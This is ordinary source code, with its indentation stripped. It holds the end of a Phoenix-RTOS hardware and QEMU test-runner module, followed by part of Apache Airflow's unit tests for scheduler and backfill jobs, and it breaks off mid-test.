except (TIMEOUT, EOF, PloError, PhoenixdError) as exc:
exception = f'{exc}\n'
if phd:
exception = phd_error_msg(exception, phd.output())
logging.info(exception)
sys.exit(1)
self.boot()
def load(self, test):
"""Loads test ELF into syspage using plo"""
phd = None
load_dir = 'test/armv7m7-imxrt106x'
try:
with PloTalker(self.port) as plo:
self.boot()
plo.wait_prompt()
if not test.exec_cmd:
# We got plo prompt, we are ready for sending the "go!" command.
return True
with Phoenixd(self.phoenixd_port, dir=load_dir) as phd:
plo.app('usb0', test.exec_cmd[0], 'ocram2', 'ocram2')
except (TIMEOUT, EOF, PloError, PhoenixdError) as exc:
if isinstance(exc, PloError) or isinstance(exc, PhoenixdError):
test.exception = str(exc)
test.fail()
else: # TIMEOUT or EOF
test.exception = Color.colorify('EXCEPTION PLO\n', Color.BOLD)
test.handle_pyexpect_error(plo.plo, exc)
if phd:
test.exception = phd_error_msg(test.exception, phd.output())
return False
return True
def run(self, test):
if test.skipped():
return
if not self.load(test):
return
super().run(test)
class QemuRunner(Runner):
"""This class provides interface to run test case using QEMU as a device."""
def __init__(self, qemu, args):
self.qemu = qemu
self.args = args
def run(self, test):
if test.skipped():
return
proc = pexpect.spawn(self.qemu, args=self.args, encoding='utf-8', timeout=test.timeout)
try:
test.handle(proc)
finally:
proc.kill(signal.SIGTERM)
class HostRunner(Runner):
"""This class provides interface to run test case using host as a device."""
def run(self, test):
if test.skipped():
return
test_bin = PHRTOS_PROJECT_DIR / '_boot' / test.target / test.exec_cmd[0]
try:
proc = pexpect.spawn(
str(test_bin),
args=test.exec_cmd[1:],
encoding='utf-8',
timeout=test.timeout
)
except pexpect.exceptions.ExceptionPexpect:
test.handle_exception()
return
try:
test.handle(proc, psh=False)
finally:
proc.kill(signal.SIGTERM)
class RunnerFactory:
@staticmethod
def create(target):
if target == 'ia32-generic':
return QemuRunner(*QEMU_CMD[target])
if target == 'host-pc':
return HostRunner()
if target == 'armv7m7-imxrt106x':
return IMXRT106xRunner(DEVICE_SERIAL)
raise ValueError(f"Unknown Runner target: {target}")
|
test_jobs.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import datetime
import json
import logging
import multiprocessing
import os
import shutil
import threading
import time
import unittest
from tempfile import mkdtemp
import psutil
import six
import sqlalchemy
from tests.compat import Mock, patch, MagicMock, PropertyMock
from parameterized import parameterized
from airflow.utils.db import create_session
from airflow import AirflowException, settings, models
from airflow import configuration
from airflow.bin import cli
import airflow.example_dags
from airflow.executors import BaseExecutor, SequentialExecutor
from airflow.exceptions import DagConcurrencyLimitReached, NoAvailablePoolSlot
from airflow.jobs import BaseJob, BackfillJob, SchedulerJob, LocalTaskJob
from airflow.models import DAG, DagModel, DagBag, DagRun, Pool, TaskInstance as TI, \
errors, SlaMiss
from airflow.operators.bash_operator import BashOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.task.task_runner.base_task_runner import BaseTaskRunner
from airflow.utils import timezone
from airflow.utils.dag_processing import SimpleDag, SimpleDagBag, list_py_file_paths
from airflow.utils.dates import days_ago
from airflow.utils.db import provide_session
from airflow.utils.net import get_hostname
from airflow.utils.state import State
from airflow.utils.timeout import timeout
from tests.test_utils.db import clear_db_runs, clear_db_pools, clear_db_dags, \
clear_db_sla_miss, clear_db_errors
from tests.core import TEST_DAG_FOLDER
from tests.executors.test_executor import TestExecutor
from tests.compat import mock
configuration.load_test_config()
logger = logging.getLogger(__name__)
DEV_NULL = '/dev/null'
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
TRY_NUMBER = 1
# Include the words "airflow" and "dag" in the file contents,
# tricking airflow into thinking these
# files contain a DAG (otherwise Airflow will skip them)
PARSEABLE_DAG_FILE_CONTENTS = '"airflow DAG"'
UNPARSEABLE_DAG_FILE_CONTENTS = 'airflow DAG'
# Filename to be used for dags that are created in an ad-hoc manner and can be removed/
# created at runtime
TEMP_DAG_FILENAME = "temp_dag.py"
TEST_DAGS_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
class BaseJobTest(unittest.TestCase):
class TestJob(BaseJob):
__mapper_args__ = {
'polymorphic_identity': 'TestJob'
}
def __init__(self, cb):
self.cb = cb
super(BaseJobTest.TestJob, self).__init__()
def _execute(self):
return self.cb()
def test_state_success(self):
job = self.TestJob(lambda: True)
job.run()
self.assertEqual(job.state, State.SUCCESS)
self.assertIsNotNone(job.end_date)
def test_state_sysexit(self):
import sys
job = self.TestJob(lambda: sys.exit(0))
job.run()
self.assertEqual(job.state, State.SUCCESS)
self.assertIsNotNone(job.end_date)
def test_state_failed(self):
def abort():
raise RuntimeError("fail")
job = self.TestJob(abort)
with self.assertRaises(RuntimeError):
job.run()
self.assertEqual(job.state, State.FAILED)
self.assertIsNotNone(job.end_date)
class BackfillJobTest(unittest.TestCase):
def _get_dummy_dag(self, dag_id, pool=None):
dag = DAG(
dag_id=dag_id,
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='op',
pool=pool,
dag=dag)
dag.clear()
return dag
def _times_called_with(self, method, class_):
count = 0
for args in method.call_args_list:
if isinstance(args[0][0], class_):
count += 1
return count
def setUp(self):
clear_db_runs()
clear_db_pools()
self.parser = cli.CLIFactory.get_parser()
self.dagbag = DagBag(include_examples=True)
@unittest.skipIf('sqlite' in configuration.conf.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_trigger_controller_dag(self):
dag = self.dagbag.get_dag('example_trigger_controller_dag')
target_dag = self.dagbag.get_dag('example_trigger_target_dag')
dag.clear()
target_dag.clear()
scheduler = SchedulerJob()
queue = Mock()
scheduler._process_task_instances(target_dag, queue=queue)
self.assertFalse(queue.append.called)
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
ignore_first_depends_on_past=True
)
job.run()
scheduler = SchedulerJob()
queue = Mock()
scheduler._process_task_instances(target_dag, queue=queue)
self.assertTrue(queue.append.called)
target_dag.clear()
dag.clear()
@unittest.skipIf('sqlite' in configuration.conf.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_backfill_multi_dates(self):
dag = self.dagbag.get_dag('example_bash_operator')
dag.clear()
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=1),
ignore_first_depends_on_past=True
)
job.run()
session = settings.Session()
drs = session.query(DagRun).filter(
DagRun.dag_id == 'example_bash_operator'
).order_by(DagRun.execution_date).all()
self.assertTrue(drs[0].execution_date == DEFAULT_DATE)
self.assertTrue(drs[0].state == State.SUCCESS)
self.assertTrue(drs[1].execution_date ==
DEFAULT_DATE + datetime.timedelta(days=1))
self.assertTrue(drs[1].state == State.SUCCESS)
dag.clear()
session.close()
@unittest.skipIf('sqlite' in configuration.conf.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_backfill_examples(self):
"""
Test backfilling example dags
Try to backfill some of the example dags. Be carefull, not all dags are suitable
for doing this. For example, a dag that sleeps forever, or does not have a
schedule won't work here since you simply can't backfill them.
"""
include_dags = {
'example_branch_operator',
'example_bash_operator',
'example_skip_dag',
'latest_only'
}
dags = [
dag for dag in self.dagbag.dags.values()
if 'example_dags' in dag.full_filepath and dag.dag_id in include_dags
]
for dag in dags:
dag.clear(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE)
# Make sure that we have the dags that we want to test available
# in the example_dags folder, if this assertion fails, one of the
# dags in the include_dags array isn't available anymore
self.assertEqual(len(include_dags), len(dags))
for i, dag in enumerate(sorted(dags, key=lambda d: d.dag_id)):
logger.info('*** Running example DAG #{}: {}'.format(i, dag.dag_id))
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
ignore_first_depends_on_past=True)
job.run()
def test_backfill_conf(self):
dag = self._get_dummy_dag('test_backfill_conf')
executor = TestExecutor(do_update=True)
conf = json.loads("""{"key": "value"}""")
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
conf=conf)
job.run()
dr = DagRun.find(dag_id='test_backfill_conf')
self.assertEqual(conf, dr[0].conf)
@patch('airflow.jobs.LoggingMixin.log')
def test_backfill_respect_concurrency_limit(self, mock_log):
dag = self._get_dummy_dag('test_backfill_respect_concurrency_limit')
dag.concurrency = 2
executor = TestExecutor(do_update=True)
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=7),
)
job.run()
self.assertTrue(0 < len(executor.history))
concurrency_limit_reached_at_least_once = False
num_running_task_instances = 0
for running_task_instances in executor.history:
self.assertLessEqual(len(running_task_instances), dag.concurrency)
num_running_task_instances += len(running_task_instances)
if len(running_task_instances) == dag.concurrency:
concurrency_limit_reached_at_least_once = True
self.assertEquals(8, num_running_task_instances)
self.assertTrue(concurrency_limit_reached_at_least_once)
times_concurrency_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
DagConcurrencyLimitReached,
)
times_pool_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
NoAvailablePoolSlot,
)
self.assertEquals(0, times_pool_limit_reached_in_debug)
self.assertGreater(times_concurrency_limit_reached_in_debug, 0)
@patch('airflow.jobs.LoggingMixin.log')
@patch('airflow.jobs.conf.getint')
def test_backfill_with_no_pool_limit(self, mock_getint, mock_log):
non_pooled_backfill_task_slot_count = 2
def getint(section, key):
if section.lower() == 'core' and \
'non_pooled_backfill_task_slot_count' == key.lower():
return non_pooled_backfill_task_slot_count
else:
return configuration.conf.getint(section, key)
mock_getint.side_effect = getint
dag = self._get_dummy_dag('test_backfill_with_no_pool_limit')
executor = TestExecutor(do_update=True)
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=7),
)
job.run()
self.assertTrue(0 < len(executor.history))
non_pooled_task_slot_count_reached_at_least_once = False
num_running_task_instances = 0
# if no pool is specified, the number of tasks running in
# parallel per backfill should be less than
# non_pooled_backfill_task_slot_count at any point of time.
for running_task_instances in executor.history:
self.assertLessEqual(
len(running_task_instances),
non_pooled_backfill_task_slot_count,
)
num_running_task_instances += len(running_task_instances)
if len(running_task_instances) == non_pooled_backfill_task_slot_count:
non_pooled_task_slot_count_reached_at_least_once = True
self.assertEquals(8, num_running_task_instances)
self.assertTrue(non_pooled_task_slot_count_reached_at_least_once)
times_concurrency_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
DagConcurrencyLimitReached,
)
times_pool_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
NoAvailablePoolSlot,
)
self.assertEquals(0, times_concurrency_limit_reached_in_debug)
self.assertGreater(times_pool_limit_reached_in_debug, 0)
def test_backfill_pool_not_found(self):
dag = self._get_dummy_dag(
dag_id='test_backfill_pool_not_found',
pool='king_pool',
)
executor = TestExecutor(do_update=True)
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=7),
)
try:
job.run()
except AirflowException:
return
self.fail()
@patch('airflow.jobs.LoggingMixin.log')
def test_backfill_respect_pool_limit(self, mock_log):
session = settings.Session()
slots = 2
pool = Pool(
pool='pool_with_two_slots',
slots=slots,
)
session.add(pool)
session.commit()
dag = self._get_dummy_dag(
dag_id='test_backfill_respect_pool_limit',
pool=pool.pool,
)
executor = TestExecutor(do_update=True)
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=7),
)
job.run()
self.assertTrue(0 < len(executor.history))
pool_was_full_at_least_once = False
num_running_task_instances = 0
for running_task_instances in executor.history:
self.assertLessEqual(len(running_task_instances), slots)
num_running_task_instances += len(running_task_instances)
if len(running_task_instances) == slots:
pool_was_full_at_least_once = True
self.assertEquals(8, num_running_task_instances)
self.assertTrue(pool_was_full_at_least_once)
times_concurrency_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
DagConcurrencyLimitReached,
)
times_pool_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
NoAvailablePoolSlot,
)
self.assertEquals(0, times_concurrency_limit_reached_in_debug)
self.assertGreater(times_pool_limit_reached_in_debug, 0)
def test_backfill_run_rescheduled(self):
dag = DAG(
dag_id='test_backfill_run_rescheduled',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='test_backfill_run_rescheduled_task-1',
dag=dag,
)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_run_rescheduled_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.UP_FOR_RESCHEDULE)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True
)
job.run()
ti = TI(task=dag.get_task('test_backfill_run_rescheduled_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_backfill_rerun_failed_tasks(self):
dag = DAG(
dag_id='test_backfill_rerun_failed',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='test_backfill_rerun_failed_task-1',
dag=dag)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.FAILED)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_backfill_rerun_upstream_failed_tasks(self):
dag = DAG(
dag_id='test_backfill_rerun_upstream_failed',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
t1 = DummyOperator(task_id='test_backfill_rerun_upstream_failed_task-1',
dag=dag)
t2 = DummyOperator(task_id='test_backfill_rerun_upstream_failed_task-2',
dag=dag)
t1.set_upstream(t2)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_upstream_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.UPSTREAM_FAILED)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_upstream_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_backfill_rerun_failed_tasks_without_flag(self):
dag = DAG(
dag_id='test_backfill_rerun_failed',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='test_backfill_rerun_failed_task-1',
dag=dag)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.FAILED)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=False
)
with self.assertRaises(AirflowException):
job.run()
def test_backfill_ordered_concurrent_execute(self):
dag = DAG(
dag_id='test_backfill_ordered_concurrent_execute',
start_date=DEFAULT_DATE,
schedule_interval="@daily")
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op5 = DummyOperator(task_id='upstream_level_3')
# order randomly
op2.set_downstream(op3)
op1.set_downstream(op3)
op4.set_downstream(op5)
op3.set_downstream(op4)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
# test executor history keeps a list
history = executor.history
# check if right order. Every loop has a 'pause' (0) to change state
# from RUNNING to SUCCESS.
# 6,0,3,0,3,0,3,0 = 8 loops
self.assertEqual(8, len(history))
loop_count = 0
while len(history) > 0:
queued_tasks = history.pop(0)
if loop_count == 0:
# first loop should contain 6 tasks (3 days x 2 tasks)
self.assertEqual(6, len(queued_tasks))
if loop_count == 2 or loop_count == 4 or loop_count == 6:
# 3 days x 1 task
self.assertEqual(3, len(queued_tasks))
loop_count += 1
def test_backfill_pooled_tasks(self):
"""
Test that queued tasks are executed by BackfillJob
"""
session = settings.Session()
pool = Pool(pool='test_backfill_pooled_task_pool', slots=1)
session.add(pool)
session.commit()
dag = self.dagbag.get_dag('test_backfill_pooled_task_dag')
dag.clear()
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE)
# run with timeout because this creates an infinite loop if not
# caught
with timeout(seconds=30):
job.run()
ti = TI(
task=dag.get_task('test_backfill_pooled_task'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_backfill_depends_on_past(self):
"""
Test that backfill respects ignore_depends_on_past
"""
dag = self.dagbag.get_dag('test_depends_on_past')
dag.clear()
run_date = DEFAULT_DATE + datetime.timedelta(days=5)
# backfill should deadlock
self.assertRaisesRegexp(
AirflowException,
'BackfillJob is deadlocked',
BackfillJob(dag=dag, start_date=run_date, end_date=run_date).run)
BackfillJob(
dag=dag,
start_date=run_date,
end_date=run_date,
ignore_first_depends_on_past=True).run()
# ti should have succeeded
ti = TI(dag.tasks[0], run_date)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_run_ignores_all_dependencies(self):
"""
Test that run respects ignore_all_dependencies
"""
dag_id = 'test_run_ignores_all_dependencies'
dag = self.dagbag.get_dag('test_run_ignores_all_dependencies')
dag.clear()
task0_id = 'test_run_dependent_task'
args0 = ['run',
'-A',
dag_id,
task0_id,
DEFAULT_DATE.isoformat()]
cli.run(self.parser.parse_args(args0))
ti_dependent0 = TI(
task=dag.get_task(task0_id),
execution_date=DEFAULT_DATE)
ti_dependent0.refresh_from_db()
self.assertEqual(ti_dependent0.state, State.FAILED)
task1_id = 'test_run_dependency_task'
args1 = ['run',
'-A',
dag_id,
task1_id,
(DEFAULT_DATE + datetime.timedelta(days=1)).isoformat()]
cli.run(self.parser.parse_args(args1))
ti_dependency = TI(
task=dag.get_task(task1_id),
execution_date=DEFAULT_DATE + datetime.timedelta(days=1))
ti_dependency.refresh_from_db()
self.assertEqual(ti_dependency.state, State.FAILED)
task2_id = 'test_run_dependent_task'
args2 = ['run',
'-A',
dag_id,
task2_id,
(DEFAULT_DATE + datetime.timedelta(days=1)).isoformat()]
cli.run(self.parser.parse_args(args2))
ti_dependent = TI(
task=dag.get_task(task2_id),
execution_date=DEFAULT_DATE + datetime.timedelta(days=1))
ti_dependent.refresh_from_db()
self.assertEqual(ti_dependent.state, State.SUCCESS)
def test_run_naive_taskinstance(self):
"""
Test that we can run naive (non-localized) task instances
"""
NAIVE_DATE = datetime.datetime(2016, 1, 1)
dag_id = 'test_run_ignores_all_dependencies'
dag = self.dagbag.get_dag('test_run_ignores_all_dependencies')
dag.clear()
task0_id = 'test_run_dependent_task'
args0 = ['run',
'-A',
dag_id,
task0_id,
NAIVE_DATE.isoformat()]
cli.run(self.parser.parse_args(args0))
ti_dependent0 = TI(
task=dag.get_task(task0_id),
execution_date=NAIVE_DATE)
ti_dependent0.refresh_from_db()
self.assertEqual(ti_dependent0.state, State.FAILED)
def test_cli_backfill_depends_on_past(self):
"""
Test that CLI respects -I argument
"""
dag_id = 'test_dagrun_states_deadlock'
run_date = DEFAULT_DATE + datetime.timedelta(days=1)
args = [
'backfill',
dag_id,
'-l',
'-s',
run_date.isoformat(),
]
dag = self.dagbag.get_dag(dag_id)
dag.clear()
self.assertRaisesRegexp(
AirflowException,
'BackfillJob is deadlocked',
cli.backfill,
self.parser.parse_args(args))
cli.backfill(self.parser.parse_args(args + ['-I']))
ti = TI(dag.get_task('test_depends_on_past'), run_date)
ti.refresh_from_db()
# task ran
self.assertEqual(ti.state, State.SUCCESS)
dag.clear()
def test_cli_backfill_depends_on_past_backwards(self):
"""
Test that CLI respects -B argument and raises on interaction with depends_on_past
"""
dag_id = 'test_depends_on_past'
start_date = DEFAULT_DATE + datetime.timedelta(days=1)
end_date = start_date + datetime.timedelta(days=1)
args = [
'backfill',
dag_id,
'-l',
'-s',
start_date.isoformat(),
'-e',
end_date.isoformat(),
'-I'
]
dag = self.dagbag.get_dag(dag_id)
dag.clear()
cli.backfill(self.parser.parse_args(args + ['-I']))
ti = TI(dag.get_task('test_dop_task'), end_date)
ti.refresh_from_db()
# runs fine forwards
self.assertEqual(ti.state, State.SUCCESS)
# raises backwards
expected_msg = 'You cannot backfill backwards because one or more tasks depend_on_past: {}'.format(
'test_dop_task')
self.assertRaisesRegexp(
AirflowException,
expected_msg,
cli.backfill,
self.parser.parse_args(args + ['-B']))
def test_cli_receives_delay_arg(self):
"""
Tests that the --delay argument is passed correctly to the BackfillJob
"""
dag_id = 'example_bash_operator'
run_date = DEFAULT_DATE
args = [
'backfill',
dag_id,
'-s',
run_date.isoformat(),
'--delay_on_limit',
'0.5',
]
parsed_args = self.parser.parse_args(args)
self.assertEqual(0.5, parsed_args.delay_on_limit)
def _get_dag_test_max_active_limits(self, dag_id, max_active_runs=1):
dag = DAG(
dag_id=dag_id,
start_date=DEFAULT_DATE,
schedule_interval="@hourly",
max_active_runs=max_active_runs
)
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op1 >> op2 >> op3
op4 >> op3
dag.clear()
return dag
def test_backfill_max_limit_check_within_limit(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_within_limit',
max_active_runs=16)
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
dagruns = DagRun.find(dag_id=dag.dag_id)
self.assertEqual(2, len(dagruns))
self.assertTrue(all([run.state == State.SUCCESS for run in dagruns]))
def test_backfill_max_limit_check(self):
dag_id = 'test_backfill_max_limit_check'
run_id = 'test_dagrun'
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
dag_run_created_cond = threading.Condition()
def run_backfill(cond):
cond.acquire()
try:
dag = self._get_dag_test_max_active_limits(dag_id)
# this session object is different than the one in the main thread
thread_session = settings.Session()
# Existing dagrun that is not within the backfill range
dag.create_dagrun(
run_id=run_id,
state=State.RUNNING,
execution_date=DEFAULT_DATE + datetime.timedelta(hours=1),
start_date=DEFAULT_DATE,
)
thread_session.commit()
cond.notify()
finally:
cond.release()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
thread_session.close()
backfill_job_thread = threading.Thread(target=run_backfill,
name="run_backfill",
args=(dag_run_created_cond,))
dag_run_created_cond.acquire()
session = settings.Session()
backfill_job_thread.start()
try:
# at this point backfill can't run since the max_active_runs has been
# reached, so it is waiting
dag_run_created_cond.wait(timeout=1.5)
dagruns = DagRun.find(dag_id=dag_id)
dr = dagruns[0]
self.assertEqual(1, len(dagruns))
self.assertEqual(dr.run_id, run_id)
# allow the backfill to execute by setting the existing dag run to SUCCESS,
# backfill will execute dag runs 1 by 1
dr.set_state(State.SUCCESS)
session.merge(dr)
session.commit()
session.close()
backfill_job_thread.join()
dagruns = DagRun.find(dag_id=dag_id)
self.assertEqual(3, len(dagruns)) # 2 from backfill + 1 existing
self.assertEqual(dagruns[-1].run_id, dr.run_id)
finally:
dag_run_created_cond.release()
def test_backfill_max_limit_check_no_count_existing(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_no_count_existing')
start_date = DEFAULT_DATE
end_date = DEFAULT_DATE
# Existing dagrun that is within the backfill range
dag.create_dagrun(run_id="test_existing_backfill",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
# BackfillJob will run since the existing DagRun does not count for the max
# active limit since it's within the backfill date range.
dagruns = DagRun.find(dag_id=dag.dag_id)
# will only be able to run 1 (the existing one) since there's just
# one dag run slot left given the max_active_runs limit
self.assertEqual(1, len(dagruns))
self.assertEqual(State.SUCCESS, dagruns[0].state)
def test_backfill_max_limit_check_complete_loop(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_complete_loop')
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
# Given the max limit to be 1 in active dag runs, we need to run the
# backfill job 3 times
success_expected = 2
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
success_dagruns = len(DagRun.find(dag_id=dag.dag_id, state=State.SUCCESS))
running_dagruns = len(DagRun.find(dag_id=dag.dag_id, state=State.RUNNING))
self.assertEqual(success_expected, success_dagruns)
self.assertEqual(0, running_dagruns) # no dag_runs in running state are left
def test_sub_set_subdag(self):
dag = DAG(
'test_sub_set_subdag',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op5 = DummyOperator(task_id='upstream_level_3')
# order randomly
op2.set_downstream(op3)
op1.set_downstream(op3)
op4.set_downstream(op5)
op3.set_downstream(op4)
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor(do_update=True)
sub_dag = dag.sub_dag(task_regex="leave*",
include_downstream=False,
include_upstream=False)
job = BackfillJob(dag=sub_dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor)
job.run()
self.assertRaises(sqlalchemy.orm.exc.NoResultFound, dr.refresh_from_db)
# the run_id should have changed, so a refresh won't work
drs = DagRun.find(dag_id=dag.dag_id, execution_date=DEFAULT_DATE)
dr = drs[0]
self.assertEqual(BackfillJob.ID_FORMAT_PREFIX.format(DEFAULT_DATE.isoformat()),
dr.run_id)
for ti in dr.get_task_instances():
if ti.task_id == 'leave1' or ti.task_id == 'leave2':
self.assertEqual(State.SUCCESS, ti.state)
else:
self.assertEqual(State.NONE, ti.state)
def test_backfill_fill_blanks(self):
dag = DAG(
'test_backfill_fill_blanks',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'},
)
with dag:
op1 = DummyOperator(task_id='op1')
op2 = DummyOperator(task_id='op2')
op3 = DummyOperator(task_id='op3')
op4 = DummyOperator(task_id='op4')
op5 = DummyOperator(task_id='op5')
op6 = DummyOperator(task_id='op6')
dag.clear()
dr = dag.create_dagrun(run_id='test',
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor(do_update=True)
session = settings.Session()
tis = dr.get_task_instances()
for ti in tis:
if ti.task_id == op1.task_id:
ti.state = State.UP_FOR_RETRY
ti.end_date = DEFAULT_DATE
elif ti.task_id == op2.task_id:
ti.state = State.FAILED
elif ti.task_id == op3.task_id:
ti.state = State.SKIPPED
elif ti.task_id == op4.task_id:
ti.state = State.SCHEDULED
elif ti.task_id == op5.task_id:
ti.state = State.UPSTREAM_FAILED
# op6 = None
session.merge(ti)
session.commit()
session.close()
job = BackfillJob(dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor)
self.assertRaisesRegexp(
AirflowException,
'Some task instances failed',
job.run)
self.assertRaises(sqlalchemy.orm.exc.NoResultFound, dr.refresh_from_db)
# the run_id should have changed, so a refresh won't work
drs = DagRun.find(dag_id=dag.dag_id, execution_date=DEFAULT_DATE)
dr = drs[0]
self.assertEqual(dr.state, State.FAILED)
tis = dr.get_task_instances()
